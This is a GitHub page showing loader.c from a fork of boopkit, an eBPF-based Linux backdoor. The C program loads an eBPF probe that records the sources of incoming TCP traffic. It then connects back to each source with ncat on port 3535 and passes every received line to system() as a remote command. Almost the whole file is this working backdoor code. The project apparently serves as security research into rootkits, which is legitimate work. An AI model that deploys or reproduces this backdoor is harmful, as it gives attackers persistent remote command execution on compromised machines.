forked from krisnova/boopkit
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathloader.c
127 lines (110 loc) · 4.15 KB
/
loader.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
// Copyright © 2022 Kris Nóva <[email protected]>
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
// ███╗ ██╗ ██████╗ ██╗ ██╗ █████╗
// ████╗ ██║██╔═████╗██║ ██║██╔══██╗
// ██╔██╗ ██║██║██╔██║██║ ██║███████║
// ██║╚██╗██║████╔╝██║╚██╗ ██╔╝██╔══██║
// ██║ ╚████║╚██████╔╝ ╚████╔╝ ██║ ██║
// ╚═╝ ╚═══╝ ╚═════╝ ╚═══╝ ╚═╝ ╚═╝
//
#include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <bpf/bpf.h>
#include <bpf/libbpf.h>
#include <arpa/inet.h>
#include <unistd.h>
#include "proto.h"
// PORT must match the ${SRC_PORT} in the /remote script!
#define PORT 3535
int main(int argc, char **argv) {
char path[PATH_MAX] = "boopkit.o";
int loaded;
struct bpf_object *obj;
printf("-----------------------------------------------\n");
printf("Loading eBPF Probe: %s\n", path);
obj = bpf_object__open(path);
if (!obj) {
printf("Unable to load eBPF object: %s\n", path);
return 1;
}
loaded = bpf_object__load(obj);
if (loaded < 0) {
printf("Unable to start eBPF probe: %s\n", path);
return 1;
}
printf("eBPF Probe Loaded: %s\n", path);
// Name
const char *objname = bpf_object__name(obj);
printf("eBPF Object Name: %s\n", objname);
struct bpf_program *program = NULL;
// TODO Iterate over programs if we end up adding more
program = bpf_object__next_program(obj, NULL);
printf("eBPF Program Address: %p\n", program);
// Program Name
const char *progname = bpf_program__name(program);
printf("eBPF Program Name: %s\n", progname);
// Program Section Name
const char *progsecname = bpf_program__section_name(program);
printf("eBPF Program Section Name: %s\n", progsecname);
struct bpf_link *link = bpf_program__attach(program);
if (!link) {
printf("Unable to link eBPF program: %s\n", progname);
return 2;
}
// TODO We probably want to "pin" the eBPF probe so that it will persist
struct bpf_map *map = bpf_object__next_map(obj, NULL);
const char *mapname = bpf_map__name(map);
printf("eBPF Map Name: %s\n", mapname);
int fd = bpf_map__fd(map);
printf("eBPF Program Linked!\n");
printf("Logs: cat /sys/kernel/tracing/trace_pipe\n");
printf("-----------------------------------------------\n");
while(1) {
int lookup_key = 0, next_key;
struct tcp_return ret;
int err;
while (!bpf_map_get_next_key(fd, &lookup_key, &next_key)) {
err = bpf_map_lookup_elem(fd, &next_key, &ret);
if (err < 0) {
continue;
}
// Dial back to the remote
// Saturn Valley. If you know, you know.
char saddrval[INET_ADDRSTRLEN];
inet_ntop(AF_INET, &ret.saddr, saddrval, sizeof (saddrval));
printf("Dialing source for RCE: %s\n", saddrval);
// Find the RCE from the source
char cmd[1024];
char rce[1024];
sprintf(cmd, "ncat %s %d", saddrval, PORT);
FILE *fp;
fp = popen(cmd, "r");
if (fp == NULL) {
continue;
}
while (fgets(rce, sizeof rce, fp) != NULL) {
// RCE here
printf("RCE: %s\n", rce);
system(rce);
}
err = bpf_map_delete_elem(fd, &next_key);
if (err < 0) {
return 0;
}
lookup_key = next_key;
}
}
}